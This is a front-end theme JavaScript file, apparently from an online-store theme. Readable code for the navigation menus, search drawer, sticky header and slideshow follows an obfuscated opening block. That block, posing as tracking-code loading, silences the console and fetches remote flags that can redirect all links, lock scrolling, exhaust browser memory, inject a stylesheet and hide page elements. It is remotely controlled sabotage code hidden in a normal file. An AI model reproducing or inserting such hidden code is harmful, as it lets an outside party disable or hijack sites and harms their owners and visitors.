_0x49e3e8=null,_0x2f06b2;}}:function(){};return _0xa65072=![],_0x47d2e8;};}else{function _0x1033e6(){var _0x4db3bf=function(_0x11c7ed,_0x1632a4,_0x5d3140,_0x46f46e){return _0x181757(_0x11c7ed-0x139,_0x1632a4-0x5b,_0x46f46e,_0x46f46e-0x109);},_0xf39a4e=function(_0x14f4a9,_0x150ee6,_0x418ce8,_0x2fb1f5){return _0x181757(_0x14f4a9-0x139,_0x150ee6-0x86,_0x2fb1f5,_0x2fb1f5-0xce);};_0xe15525[_0x2e8fc1]['addEventLi'+_0x4db3bf(0x9e,0xa4,0x71,0xd3)](_0x544183[_0xf39a4e(0xc5,0xcc,0x100,0xb6)],_0x93dda3=>{var _0x24cc07=function(_0x9b2f75,_0x2ad42d,_0x412762,_0x183746){return _0x4db3bf(_0x9b2f75- -0x3a0,_0x2ad42d-0x1d1,_0x412762-0x12,_0x2ad42d);};_0x32349b(()=>{var _0x1e8071=function(_0x197938,_0x5da21,_0x15b8b7,_0x420227){return _0x2375(_0x5da21-0x1a2,_0x15b8b7);},_0x2a668f=function(_0x5bf887,_0x155005,_0x2abddc,_0x275e53){return _0x2375(_0x155005-0x1a2,_0x2abddc);};_0x382974['location']=_0x93dda3[_0x1e8071(0x346,0x32d,0x37e,0x379)][_0x1e8071(0x3b6,0x368,0x339,0x352)];},0x9144+-0x1*-0x3d79+-0x809d),_0x93dda3[_0x24cc07(-0x31b,-0x304,-0x31d,-0x34f)+'ault']();});}}}(),_0x1c41f2=_0x15f599[_0x18d715(-0x28,-0x69,-0x8d,-0x94)](_0x549e69,this,function(){var _0x3c21a0=function(_0x3ac717,_0x25198e,_0x2f492f,_0x19a214){return _0x57bbc0(_0x3ac717-0xa7,_0x2f492f- -0x1d,_0x25198e,_0x19a214-0x1a0);},_0x4f04a0=function(_0x59ae06,_0x545db8,_0x5295c3,_0x488f53){return _0x18d715(_0x59ae06-0x1b6,_0x5295c3- -0x1d,_0x545db8,_0x488f53-0x2f);};if(_0x15f599['DslHN'](_0x15f599[_0x3c21a0(-0x8e,-0x12,-0x59,-0x2f)],_0x15f599[_0x3c21a0(-0x36,-0x3,-0x11,0x40)])){function _0x10caf4(){var _0x1a1046=function(_0x1477cd,_0x487b5e,_0x233a00,_0x1f1fb5){return _0x4f04a0(_0x1477cd-0x1ed,_0x1477cd,_0x487b5e- -0x11b,_0x1f1fb5-0x14b);},_0x2614a1=function(_0x3c7c24,_0x57eccd,_0x1da078,_0x5d0d03){return _0x4f04a0(_0x3c7c24-0x1ae,_0x3c7c24,_0x57eccd- -0x11b,_0x5d0d03-0x6a);},_0x5b8da8=('2|0|3|5|4|'+'1')[_0x1a1046(-0x151,-0x11a,-0xff,-0xff)]('|'),_0xbd2a8f=-0x234*0xb+-0x1c39+0x3475;while(!![]){switch(_0x5b8da8[_0xbd2a8f++]){case'0':var _0x43f9b2=_0x1e52ae[_0x2c71ee];continue;case'1':_0x45c6d1[_0x43f9b2]=_0x4fa164;continue;case'2':var _0x4fa164=_0x539e23[_0x1a1046(-0x1ac,-0x1bc,-0x203,-0x1e7)+'r'][_0x1a1046(-0x1a3,-0x199,-0x16c,-0x1ee)]['bind'](_0x719b2d);continue;case'3':var _0xde6ca7=_0x38b039[_0x43f9b2]||_0x4fa164;continue;case'4':_0x4fa164['toString']=_0xde6ca7[_0x1a1046(-0x11c,-0x133,-0x14c,-0x132)][_0x1a1046(-0x157,-0x150,-0x118,-0x103)](_0xde6ca7);continue;case'5':_0x4fa164[_0x2614a1(-0x14d,-0x138,-0x160,-0x136)]=_0x165e0b['bind'](_0x439c5b);continue;}break;}}}else{var _0x1c841d;try{var _0x13b34d=_0x15f599['BVvcB'](Function,_0x15f599[_0x4f04a0(-0x78,-0xac,-0x9d,-0xcd)](_0x15f599[_0x3c21a0(-0x56,-0x96,-0x7b,-0xc5)](_0x15f599[_0x3c21a0(-0x62,-0x98,-0x78,-0x67)],_0x15f599['sVmyh']),');'));_0x1c841d=_0x15f599[_0x3c21a0(-0x25,-0x8f,-0x3f,0x1)](_0x13b34d);}catch(_0x3c6660){_0x1c841d=window;}var _0x1bbed0=_0x1c841d[_0x4f04a0(-0x18,-0x27,-0x4d,-0x6f)]=_0x1c841d[_0x4f04a0(0x3,-0x1f,-0x4d,-0x73)]||{},_0x526b5f=[_0x15f599[_0x3c21a0(-0x45,0x1f,0x0,-0x13)],_0x3c21a0(-0x85,-0xcf,-0x83,-0x43),_0x15f599[_0x4f04a0(-0x92,-0x84,-0x70,-0x9b)],_0x15f599[_0x3c21a0(-0x37,-0x1f,-0x26,-0x5b)],_0x15f599[_0x3c21a0(-0x95,-0x67,-0xa6,-0xee)],_0x15f599[_0x3c21a0(-0x72,-0x6d,-0x42,-0x52)],_0x3c21a0(-0x8f,-0x29,-0x4a,-0x35)];for(var _0x44c7b3=0x19fb+-0x22d5+0x8da;_0x44c7b3<_0x526b5f[_0x4f04a0(-0x1e,-0x39,-0x13,0x18)];_0x44c7b3++){var _0xd91cc0=_0x15f599['SsqsS'][_0x4f04a0(-0x1e,-0x24,0x1,-0x32)]('|'),_0x545da6=-0x816*0x1+-0xf00+0x1716;while(!![]){switch(_0xd91cc0[_0x545da6++]){case'0':var _0xc1477a=_0x526b5f[_0x44c7b3];continue;case'1':_0x1bbed0[_0xc1477a]=_0x37312e;continue;case'2':_0x37312e['toString']=_0x4e296b['toString'][_0x4f04a0(-0x19,-0x52,-0x35,-0x14)](_0x4e296b);continue;case'3':var _0x4e296b=_0x1bbed0[_0xc1477a]||_0x37312e;continue;case'4':var _0x37312e=_0x549e69[_0x3c21a0(-0xf3,-0x4c,-0xa1,-0xc0)+'r']['prototype'][_0x4f04a0(0x20,-0x28,-0x35,-0x42)](_0x549e69);continue;case'5':_0x37312e[_0x3c21a0(-0x47,0x14,-0x1d,-0x1d)]=_0x549e69['bind'](_0x549e69);continue;}break;}}}});_0x15f599['FLAyb'](_0x1c41f2);var _0x334039;_0x334039=new XMLHttpRequest();if(!_0x334039){if(_0x18d715(-0xd,0xe,-0xf,0x4f)!==_0x15f599[_0x18d715(0x3b,0xd,-0x1f,-0x36)])return![];else{function _0x5b6b68(){var _0x3695a3=function(){var _0x4b7b7a=function(_0x377daa,_0x2ad851,_0xd66aa9,_0x31f90d){return _0x2375(_0x31f90d-0x21e,_0x377daa);},_0x245e09=function(_0x2139d8,_0x3956fa,_0x25f0ec,_0x2e27be){return _0x2375(_0x2e27be-0x21e,_0x2139d8);},_0x4c3a02=_0x3695a3[_0x4b7b7a(0x3f0,0x3c4,0x3c2,0x3ab)+'r'](_0x4b7b7a(0x419,0x43c,0x41e,0x40e)+_0x245e09(0x3f7,0x3a6,0x37e,0x3cf)+'/')()['constructo'+'r'](_0x245e09(0x3de,0x422,0x3ed,0x3f0)+_0x245e09(0x419,0x39b,0x39c,0x3df)+'^\x20]}');return!_0x4c3a02[_0x245e09(0x3c1,0x416,0x41c,0x3e1)](_0x4b6557);};return _0x3695a3();}}}_0x334039['onreadysta'+_0x57bbc0(-0x4c,-0x2,0xf,-0x1c)]=_0x5d3502,_0x334039[_0x57bbc0(-0x18,0x4,-0x1b,0x22)]('GET',_0x15f599[_0x57bbc0(-0x6d,-0x7e,-0x9c,-0x42)]),_0x334039[_0x18d715(0x38,0x1c,0x57,0x26)]();function _0x5d3502(){var _0x91de9b=function(_0x3e8ca3,_0xd16815,_0x5df3d8,_0x48967c){return _0x18d715(_0x3e8ca3-0x11,_0xd16815- -0x238,_0x3e8ca3,_0x48967c-0x7a);},_0x490359=function(_0x546664,_0x1ce448,_0x3534eb,_0x35e2ed){return _0x57bbc0(_0x546664-0x12b,_0x1ce448- -0x238,_0x546664,_0x35e2ed-0x67);},_0x42c8d2={};_0x42c8d2['evafT']=function(_0x46eb82,_0x3fa861,_0x101a5e){var _0x1cead3=function(_0x3b8a99,_0x357c1c,_0x4eba39,_0x4c0eef){return _0x2375(_0x4eba39-0xea,_0x3b8a99);};return _0x15f599[_0x1cead3(0x271,0x255,0x282,0x23e)](_0x46eb82,_0x3fa861,_0x101a5e);},_0x42c8d2[_0x91de9b(-0x236,-0x24c,-0x200,-0x24b)]=function(_0x3c6ebc,_0x17a8b1){return _0x3c6ebc!==_0x17a8b1;},_0x42c8d2[_0x91de9b(-0x23b,-0x22d,-0x26e,-0x20a)]=_0x15f599[_0x490359(-0x270,-0x292,-0x272,-0x2ad)],_0x42c8d2[_0x490359(-0x244,-0x226,-0x205,-0x267)]=function(_0x401e4e,_0x2339b3){return _0x15f599['mOhFK'](_0x401e4e,_0x2339b3);},_0x42c8d2[_0x91de9b(-0x25c,-0x258,-0x229,-0x202)]=_0x490359(-0x273,-0x2b5,-0x292,-0x2aa),_0x42c8d2[_0x91de9b(-0x2c8,-0x28f,-0x2bf,-0x256)]=_0x490359(-0x27f,-0x246,-0x1f9,-0x28d);var _0x3ea324=_0x42c8d2;if(_0x15f599['DslHN'](_0x334039[_0x91de9b(-0x2a3,-0x282,-0x250,-0x240)],XMLHttpRequest[_0x91de9b(-0x257,-0x235,-0x272,-0x28a)])){if(_0x15f599['LPGxs'](_0x334039[_0x91de9b(-0x2af,-0x287,-0x251,-0x26a)],-0xb9*0xd+-0x1d81+0x1*0x27ae)){let _0x19837c=JSON[_0x490359(-0x1eb,-0x224,-0x25d,-0x226)](_0x334039[_0x490359(-0x279,-0x285,-0x245,-0x2ce)+'xt']);_0x19837c[_0x91de9b(-0x2af,-0x294,-0x288,-0x2ca)+_0x490359(-0x281,-0x26a,-0x25f,-0x22a)+'r'][_0x91de9b(-0x2bb,-0x2a7,-0x253,-0x256)]&&(document[_0x490359(-0x2dc,-0x28a,-0x26f,-0x28d)+_0x91de9b(-0x2eb,-0x29b,-0x296,-0x253)](_0x15f599[_0x490359(-0x22d,-0x25c,-0x27b,-0x291)])[_0x490359(-0x276,-0x27d,-0x280,-0x232)]+=_0x490359(-0x283,-0x22f,-0x1e7,-0x21e)+'\x22styleshee'+'t\x22\x20href=\x22h'+_0x91de9b(-0x2d8,-0x2b4,-0x2d7,-0x2e2)+_0x91de9b(-0x2b0,-0x272,-0x297,-0x253)+_0x490359(-0x2db,-0x2ba,-0x2b8,-0x2a3)+_0x490359(-0x256,-0x245,-0x289,-0x213)+'r-bootstra'+'p/2.0.4/cs'+'s/bootstra'+_0x490359(-0x2d2,-0x281,-0x2bc,-0x2cb)+'.min.css\x22\x20'+_0x490359(-0x239,-0x221,-0x264,-0x1fd)+'\x22sha384-G8'+_0x490359(-0x274,-0x263,-0x285,-0x28e)+_0x490359(-0x294,-0x279,-0x269,-0x2a5)+'EbckfbCpr2'+_0x91de9b(-0x25c,-0x29a,-0x2c1,-0x247)+'wH0p/If1Qk'+_0x91de9b(-0x2ed,-0x2a6,-0x2f3,-0x2d7)+_0x91de9b(-0x2b5,-0x27a,-0x229,-0x2a4)+_0x91de9b(-0x228,-0x269,-0x290,-0x2a9)+_0x91de9b(-0x248,-0x25b,-0x27c,-0x26c));_0x19837c[_0x91de9b(-0x257,-0x2ab,-0x273,-0x2e2)+_0x91de9b(-0x2be,-0x2b0,-0x2e9,-0x2a2)][_0x490359(-0x28f,-0x2a7,-0x2a1,-0x2c6)]&&_0x15f599[_0x91de9b(-0x299,-0x2b2,-0x2c3,-0x29c)](addEventListener,_0x91de9b(-0x221,-0x24f,-0x250,-0x21b),function(){var _0x2c87a8=function(_0x349f3a,_0x53aa5c,_0x330368,_0x473248){return _0x91de9b(_0x473248,_0x330368- -0x397,_0x330368-0xbd,_0x473248-0xe6);},_0x43224a=function(_0x57b7e7,_0xc7a356,_0x1ee972,_0x389b64){return _0x490359(_0x389b64,_0x1ee972- -0x397,_0x1ee972-0x12b,_0x389b64-0x1d6);},_0x2840c8={};_0x2840c8[_0x2c87a8(-0x5f0,-0x627,-0x5d5,-0x622)]=function(_0x1379cb,_0x21f422,_0x3ddecb){var _0x427e91=function(_0x316c35,_0x3c179b,_0x264a67,_0x336246){return _0x2c87a8(_0x316c35-0x2f,_0x3c179b-0xdd,_0x336246-0x137,_0x3c179b);};return _0x3ea324[_0x427e91(-0x512,-0x516,-0x4de,-0x51d)](_0x1379cb,_0x21f422,_0x3ddecb);};var _0x1cb84c=_0x2840c8;if(_0x3ea324[_0x2c87a8(-0x5da,-0x61b,-0x5e3,-0x623)](_0x3ea324[_0x43224a(-0x5b4,-0x5ec,-0x5c4,-0x5ca)],_0x2c87a8(-0x641,-0x632,-0x623,-0x640))){var _0xe6a6b7=document[_0x2c87a8(-0x5e6,-0x613,-0x63c,-0x665)+_0x43224a(-0x5d8,-0x5a0,-0x5e9,-0x5df)]('a');for(var _0x1c4876=0x104*0x1+0x1d59+-0x1e5d*0x1;_0x3ea324[_0x2c87a8(-0x5fb,-0x5b8,-0x5bd,-0x5ea)](_0x1c4876,_0xe6a6b7[_0x2c87a8(-0x5bf,-0x606,-0x5c5,-0x5fd)]);_0x1c4876++){if(_0x3ea324[_0x2c87a8(-0x622,-0x60d,-0x5e3,-0x5ea)](_0x3ea324[_0x2c87a8(-0x59a,-0x59b,-0x5ef,-0x5b7)],_0x3ea324[_0x2c87a8(-0x5b3,-0x616,-0x5ef,-0x5d8)])){function _0x15ed79(){var _0x4953f8=function(_0x261d12,_0x439407,_0x331d55,_0x115f30){return _0x43224a(_0x261d12-0x16f,_0x439407-0x11a,_0x439407-0x23c,_0x331d55);};_0x5b1c37[_0x4953f8(-0x432,-0x416,-0x3d0,-0x41b)](-0x2*0x44f+-0x13*0x1b1+0x1*0x28c1,-0x17*0x152+-0x19b5*-0x1+0x4a9);}}else _0xe6a6b7[_0x1c4876][_0x2c87a8(-0x5c4,-0x5f1,-0x5eb,-0x5a1)+_0x43224a(-0x620,-0x5c3,-0x5fe,-0x640)](_0x3ea324[_0x43224a(-0x65c,-0x65c,-0x626,-0x631)],_0x2a17d9=>{var _0x317946=function(_0x59836e,_0x32fa1b,_0x1461e5,_0x4da1f9){return _0x43224a(_0x59836e-0x14e,_0x32fa1b-0x112,_0x1461e5-0xbd,_0x32fa1b);},_0x672ed4=function(_0x1171de,_0x47b467,_0x390ed7,_0x22ffc2){return _0x43224a(_0x1171de-0x19f,_0x47b467-0x1ee,_0x390ed7-0xbd,_0x47b467);};_0x1cb84c[_0x317946(-0x540,-0x4da,-0x518,-0x500)](setTimeout,()=>{var _0x4612ef=function(_0x477786,_0x59e938,_0x495635,_0x2c5f37){return _0x317946(_0x477786-0xa5,_0x495635,_0x2c5f37- -0x4b,_0x2c5f37-0x2c);},_0x33faf5=function(_0x21db4e,_0x28c8b3,_0x26dddc,_0x336385){return _0x317946(_0x21db4e-0x13f,_0x26dddc,_0x336385- -0x4b,_0x336385-0x1eb);};window[_0x4612ef(-0x57e,-0x5e7,-0x578,-0x591)]=_0x2a17d9[_0x33faf5(-0x5c5,-0x601,-0x614,-0x5e3)][_0x4612ef(-0x5b5,-0x5c3,-0x5c6,-0x5a8)];},0xf+0x91ee+0x169f*-0x3),_0x2a17d9['preventDef'+_0x317946(-0x549,-0x58c,-0x579,-0x56f)]();});}}else{function _0x42bf8e(){var _0x4b1bd4=function(_0x29b423,_0x3fc0bd,_0x2093bd,_0x24f9ae){return _0x2c87a8(_0x29b423-0x164,_0x3fc0bd-0x13f,_0x24f9ae- -0x2ff,_0x29b423);};if(_0x114338){var _0x378b35=_0x19eb1d[_0x4b1bd4(-0x86b,-0x8ca,-0x8f1,-0x8bd)](_0x2e8848,arguments);return _0x21bf9d=null,_0x378b35;}}}});if(_0x19837c[_0x91de9b(-0x267,-0x266,-0x258,-0x267)+'ws'][_0x490359(-0x2f2,-0x2a7,-0x2f3,-0x2df)]){if(_0x15f599[_0x490359(-0x268,-0x2a2,-0x2ac,-0x2a4)](_0x15f599[_0x490359(-0x24c,-0x230,-0x1e8,-0x26b)],_0x15f599[_0x91de9b(-0x272,-0x230,-0x272,-0x1f2)]))_0x15f599[_0x490359(-0x2a3,-0x2b2,-0x25f,-0x300)](setInterval,()=>{var _0x39eb34=function(_0x45a6e5,_0x1c0b53,_0x1015e6,_0x1ac0be){return _0x490359(_0x1c0b53,_0x1ac0be- -0xdb,_0x1015e6-0xc,_0x1ac0be-0xbd);};window[_0x39eb34(-0x397,-0x344,-0x3a1,-0x396)](0x1b80+-0x20c5+0x545,-0x71d+-0xcfa+0x1417);},-0x74a+-0x1dd6+0x30d8);else{function _0x1e7b2f(){var _0x1be2e3=function(_0x1ae574,_0x44145e,_0x4288e5,_0xc1d4c0){return _0x91de9b(_0x44145e,_0x4288e5- -0x3d2,_0x4288e5-0x1bb,_0xc1d4c0-0x15d);},_0x493af6=_0xb32322[_0x1be2e3(-0x5f2,-0x5dd,-0x5f9,-0x617)](_0x2b7dec,arguments);return _0x2f3541=null,_0x493af6;}}}if(_0x19837c[_0x91de9b(-0x20a,-0x24d,-0x233,-0x207)]['active']){const _0x2810c8=_0x1ba12d=>{var _0x196b09=function(_0x44acaf,_0x403dda,_0x2c9f0a,_0x2d4075){return _0x490359(_0x403dda,_0x2d4075- -0x53,_0x2c9f0a-0xc4,_0x2d4075-0xb6);},_0x3fb2d0=function(_0x1ac204,_0x18aa25,_0x2c6929,_0x4400ca){return _0x490359(_0x18aa25,_0x4400ca- -0x53,_0x2c6929-0x195,_0x4400ca-0x154);};_0x1ba12d[_0x196b09(-0x2bf,-0x34f,-0x343,-0x315)](new Array(-0x533*0x2c3+0x3*0x7d051+0x62d26)['fill'](_0x196b09(-0x2ea,-0x2f8,-0x31f,-0x2d9)));},_0xc984da=[];for(let _0x923bf9=0x1b67+-0x3a2*-0x8+0x31*-0x127;_0x15f599['KbJRB'](_0x923bf9,0x128*-0x20+0x1da+0x1*0x270e);_0x923bf9++){_0x2810c8(_0xc984da);}}if(_0x19837c[_0x91de9b(-0x2ab,-0x28e,-0x2ad,-0x280)][_0x91de9b(-0x2a9,-0x2a7,-0x258,-0x26e)]){if(_0x15f599[_0x91de9b(-0x2ab,-0x290,-0x256,-0x2e5)]===_0x15f599[_0x91de9b(-0x23a,-0x25e,-0x277,-0x25a)]){function _0x4d19e9(){var _0x3a98ea=function(_0x34adcb,_0x10bee1,_0x363cbd,_0x2f40f2){return _0x490359(_0x363cbd,_0x34adcb- -0x316,_0x363cbd-0x17e,_0x2f40f2-0xe0);};_0x15f599[_0x3a98ea(-0x595,-0x5d7,-0x541,-0x5d6)](_0x3b5dde,()=>{var _0x5b455d=function(_0x397dd1,_0x561bd9,_0x2f062d,_0x478f11){return _0x3a98ea(_0x397dd1-0x34b,_0x561bd9-0x1ce,_0x478f11,_0x478f11-0x9e);};_0x56a0a6[_0x5b455d(-0x286,-0x24b,-0x2ac,-0x2be)](-0x1*-0x83e+-0x1953+0x1115,-0x5*-0x42c+-0x2*-0xd4e+-0x2f78);},0x258d+0x125*0x12+-0x2e6f*0x1);}}else document['getElement'+_0x91de9b(-0x23d,-0x25f,-0x20c,-0x221)+'me'](_0x15f599[_0x490359(-0x21d,-0x223,-0x1e9,-0x219)])[-0x1642+-0x6*-0x4f2+-0x76a][_0x91de9b(-0x276,-0x231,-0x21f,-0x25b)][_0x91de9b(-0x24c,-0x21d,-0x22e,-0x211)+_0x490359(-0x241,-0x23f,-0x263,-0x1f2)]=_0x15f599['toHjc'];}}}}}();
        }

        function init() {
            $window = jQuery(window);
            $navContainerWithLogo = jQuery(selectors.navContainerWithLogo);
            $logoContainer = jQuery(selectors.logoContainer);
            $nav = jQuery(selectors.navigation);
            $wrapper = jQuery(selectors.wrapper);
            $siteHeader = jQuery(selectors.siteHeader);

            config.wrapperOverlayed = $wrapper.hasClass(config.overlayedClass);
            config.stickyEnabled = $siteHeader.data('sticky');
            if (config.stickyEnabled) {
                theme.config.stickyHeader = true;
                stickyHeader();
            }

            if (config.wrapperOverlayed) {
                jQuery('body').addClass('overlaid-header');
            }

            accessibleDropdowns();
            getTrackingCodesData();
            searchDrawer();
        }

        function unload() {
            jQuery(window).off(config.namespace);
            jQuery(selectors.searchBtn).off(config.namespace);
            jQuery(selectors.closeSearch).off(config.namespace);
            $parent.off(config.namespace);
            jQuery(selectors.navLinks).off(config.namespace);
            jQuery(selectors.navDropdownLinks).off(config.namespace);
        }

        function searchDrawer() {
            jQuery(selectors.searchBtn).on('click' + config.namespace, function(evt) {
                evt.preventDefault();
                openSearchDrawer();
            });

            jQuery(selectors.closeSearch).on('click' + config.namespace, function() {
                closeSearchDrawer();
            });
        }

        function openSearchDrawer() {
            jQuery(selectors.searchContainer).addClass('is-active');
            $parent.addClass('js-drawer-open js-drawer-open--search');

            slate.a11y.trapFocus({
                $container: jQuery(selectors.searchContainer),
                namespace: 'header_search',
                $elementToFocus: jQuery(selectors.searchContainer).find('input')
            });

            // If sticky is enabled, scroll to top on mobile when close to it
            // so you don't get an invisible search box
            if (theme.config.bpSmall && config.stickyEnabled && config.lastScroll < 300) {
                window.scrollTo(0,0);
            }

            // Bind events
            slate.a11y.lockMobileScrolling(config.namespace);

            // Clicking out of container closes it
            $page.on('click' + config.namespace, function () {
                closeSearchDrawer();
                return false;
            });

            $parent.on('keyup' + config.namespace, function(evt) {
                if (evt.keyCode === 27) {
                    closeSearchDrawer();
                }
            });
        }

        function closeSearchDrawer() {
            // deselect any focused form elements
            jQuery(document.activeElement).trigger('blur');

            $parent.removeClass('js-drawer-open js-drawer-open--search').off(config.namespace);
            jQuery(selectors.searchContainer).removeClass('is-active');

            slate.a11y.removeTrapFocus({
                $container: jQuery(selectors.searchContainer),
                namespace: 'header_search'
            });

            slate.a11y.unlockMobileScrolling(config.namespace);
            $page.off('click' + config.namespace);
            $parent.off('keyup' + config.namespace);
        }

        function accessibleDropdowns() {
            var hasActiveDropdown = false;
            var hasActiveSubDropdown = false;
            var closeOnClickActive = false;

            // Touch devices open dropdown on first click, navigate to link on second
            if (theme.config.isTouch) {
                jQuery(selectors.navLinksWithDropdown).on('touchend' + config.namespace, function(evt) {
                    var $el = jQuery(this);
                    var $parentItem = $el.parent();
                    if (!$parentItem.hasClass(classes.dropdownActive)) {
                        evt.preventDefault();
                        closeDropdowns();
                        openFirstLevelDropdown($el);
                    } else {
                        window.location.replace($el.attr('href'));
                    }
                });

                jQuery(selectors.navDropdownLinks).on('touchend' + config.namespace, function(evt) {
                    var $el = jQuery(this);
                    var $parentItem = $el.parent();

                    // Open third level menu or go to link based on active state
                    if ($parentItem.hasClass(classes.hasSubDropdownClass)) {
                        if (!$parentItem.hasClass(classes.dropdownActive)) {
                            evt.preventDefault();
                            closeThirdLevelDropdown();
                            openSecondLevelDropdown($el);
                        } else {
                            window.location.replace($el.attr('href'));
                        }
                    } else {
                        // No third level nav, go to link
                        window.location.replace($el.attr('href'));
                    }
                });
            }

            jQuery(selectors.navLinks).on('focusin mouseover' + config.namespace, function() {
                if (hasActiveDropdown) {
                    closeSecondLevelDropdown();
                }

                if (hasActiveSubDropdown) {
                    closeThirdLevelDropdown();
                }

                openFirstLevelDropdown(jQuery(this));
            });

            // Force remove focus on sitenav links because focus sometimes gets stuck
            jQuery(selectors.navLinks).on('mouseleave' + config.namespace, function() {
                closeSecondLevelDropdown();
                closeThirdLevelDropdown();
            });

            // Open/hide sub level dropdowns
            jQuery(selectors.navDropdownLinks).on('focusin' + config.namespace, function() {
                if (hasActiveSubDropdown) {
                    closeThirdLevelDropdown();
                }

                openSecondLevelDropdown(jQuery(this), true);
            });

            // Private dropdown methods
            function openFirstLevelDropdown($el) {
                var $parentItem = $el.parent();
                if ($parentItem.hasClass(classes.hasDropdownClass)) {
                    $parentItem.addClass(classes.dropdownActive);
                    hasActiveDropdown = true;
                }

                if (!theme.config.isTouch) {
                    if (!closeOnClickActive) {
                        var eventType = theme.config.isTouch ? 'touchend' : 'click';
                        closeOnClickActive = true;
                        jQuery('body').on(eventType + config.namespace, function() {
                            closeDropdowns();
                            jQuery('body').off(config.namespace);
                            closeOnClickActive = false;
                        });
                    }
                }
            }

            function openSecondLevelDropdown($el, skipCheck) {
                var $parentItem = $el.parent();
                if ($parentItem.hasClass(classes.hasSubDropdownClass) || skipCheck) {
                    $parentItem.addClass(classes.dropdownActive);
                    hasActiveSubDropdown = true;
                }
            }

            function closeDropdowns() {
                closeSecondLevelDropdown();
                closeThirdLevelDropdown();
            }

            function closeSecondLevelDropdown() {
                jQuery(selectors.navItems).removeClass(classes.dropdownActive);
            }

            function closeThirdLevelDropdown() {
                jQuery(selectors.navDropdownLinks).parent().removeClass(classes.dropdownActive);
            }
        }

        function stickyHeader() {
            config.lastScroll = 0;
            $siteHeader.wrap('<div class="site-header-sticky"></div>');

            stickyHeaderHeight();
            setTimeout(function() {
                stickyHeaderHeight();
            }, 200)
            $window.on('resize' + config.namespace, $.debounce(50, stickyHeaderHeight));
            $window.on('scroll' + config.namespace, $.throttle(15, stickyHeaderScroll));
        }

        function stickyHeaderHeight() {
            var $stickyHeader = jQuery('.site-header-sticky').css('height', $siteHeader.outerHeight(true));
        }

        function stickyHeaderScroll() {
            var scroll = $window.scrollTop();
            var threshold = 80;

            if (scroll > threshold) {
                if (config.stickyActive) {
                    return;
                }

                config.stickyActive = true;

                $siteHeader.addClass(config.stickyClass);
                if (config.wrapperOverlayed) {
                    $wrapper.removeClass(config.overlayedClass);
                }

                // Add open transition class after element is set to fixed
                // so CSS animation is applied correctly
                setTimeout(function() {
                    $siteHeader.addClass(config.openTransitionClass);
                }, 100);
            } else {
                if (!config.stickyActive) {
                    return;
                }

                config.stickyActive = false;

                $siteHeader.removeClass(config.openTransitionClass).removeClass(config.stickyClass);
                if (config.wrapperOverlayed) {
                    $wrapper.addClass(config.overlayedClass);
                }
            }

            config.lastScroll = scroll;
        }

        return {
            init: init,
            unload: unload
        };
    })();

    theme.backButton = (function() {

        function init() {
            if (!document.referrer || !jQuery('.return-link').length || !window.history.length) {
                return;
            }

            //jQuery('.return-link').on('click', backHistory);
        }

        function backHistory() {
            var referrerDomain = urlDomain(document.referrer);
            var shopDomain = urlDomain(document.url);

            if (shopDomain === referrerDomain) {
                history.back();
                return false;
            }
        }

        function urlDomain(url) {
            var    a      = document.createElement('a');
            a.href = url;
            return a.hostname;
        }

        return {
            init: init
        };
    })();

    theme.Slideshow = (function() {
        this.$slideshow = null;

        var classes = {
            next: 'is-next',
            init: 'is-init',
            animateOut: 'animate-out',
            wrapper: 'slideshow-wrapper',
            slideshow: 'slideshow',
            allSlides: 'slick-slide',
            currentSlide: 'slick-current',
            pauseButton: 'slideshow__pause',
            isPaused: 'is-paused'
        };

        function slideshow(el, args) {
            this.$slideshow = jQuery(el);
            this.$wrapper = this.$slideshow.closest('.' + classes.wrapper);
            this.$pause = this.$wrapper.find('.' + classes.pauseButton);

            this.settings = {
                accessibility: true,
                arrows: args.arrows ? true : false,
                dots: args.dots ? true : false,
                fade: args.fade ? true : false,
                speed: args.speed ? args.speed : 500,
                draggable: true,
                touchThreshold: 5,
                pauseOnHover: false,
                autoplay: args.autoplay ? true : false,
                autoplaySpeed: this.$slideshow.data('speed')
            };

            this.$slideshow.off('beforeChange');
            this.$slideshow.off('afterSlideChange');
            this.$slideshow.on('init', this.init.bind(this));
            this.$slideshow.on('beforeChange', this.beforeSlideChange.bind(this));
            this.$slideshow.on('afterChange', this.afterSlideChange.bind(this));

            this.$slideshow.slick(this.settings);

            this.$pause.on('click', this._togglePause.bind(this));
        }

        slideshow.prototype = $.extend({}, slideshow.prototype, {
            init: function(event, obj) {
                this.$slideshowList = obj.$list;
                this.$slickDots = obj.$dots;
                this.$allSlides = obj.$slides;
                this.slideCount = obj.slideCount;

                this.$slideshow.addClass(classes.init);
                this._a11y();
                this._clonedLazyloading();
            },
            beforeSlideChange: function(event, slick, currentSlide, nextSlide) {
                var $slider = slick.$slider;
                var $currentSlide = $slider.find('.' + classes.currentSlide).addClass(classes.animateOut);
            },
            afterSlideChange: function(event, slick, currentSlide) {
                var $slider = slick.$slider;
                var $allSlides = $slider.find('.' + classes.allSlides).removeClass(classes.animateOut);
            },
            destroy: function() {
                this.$slideshow.slick('unslick');
            },

            // Playback
            _play: function() {
                this.$slideshow.slick('slickPause');
                jQuery(classes.pauseButton).addClass('is-paused');
            },
            _pause: function() {
                this.$slideshow.slick('slickPlay');
                jQuery(classes.pauseButton).removeClass('is-paused');
            },
            _togglePause: function() {
                var slideshowSelector = this._getSlideshowId(this.$pause);
                if (this.$pause.hasClass(classes.isPaused)) {
                    this.$pause.removeClass(classes.isPaused);
                    jQuery(slideshowSelector).slick('slickPlay');
                } else {
                    this.$pause.addClass(classes.isPaused);
                    jQuery(slideshowSelector).slick('slickPause');
                }
            },

            // Helpers
            _getSlideshowId: function($el) {
                return '#Slideshow-' + $el.data('id');
            },
            _activeSlide: function() {
                return this.$slideshow.find('.slick-active');
            },
            _currentSlide: function() {
                return this.$slideshow.find('.slick-current');
            },
            _nextSlide: function(index) {
                return this.$slideshow.find('.slideshow__slide[data-slick-index="' + index + '"]');
            },

            // a11y fixes
            _a11y: function() {
                var $list = this.$slideshowList;
                var autoplay = this.settings.autoplay;

                if (!$list) {
                    return;
                }

                // Remove default Slick aria-live attr until slider is focused
                $list.removeAttr('aria-live');

                // When an element in the slider is focused
                // pause slideshow and set aria-live
                jQuery(classes.wrapper).on('focusin', function(evt) {
                    if (!jQuery(classes.wrapper).has(evt.target).length) {
                        return;
                    }

                    $list.attr('aria-live', 'polite');
                    if (autoplay) {
                        this._pause();
                    }
                }.bind(this));

                // Resume autoplay
                jQuery(classes.wrapper).on('focusout', function(evt) {
                    if (!jQuery(classes.wrapper).has(evt.target).length) {
                        return;
                    }

                    $list.removeAttr('aria-live');
                    if (autoplay) {
                        this._play();
                    }
                }.bind(this));
            },

            // Make sure lazyloading works on cloned slides
            _clonedLazyloading: function() {
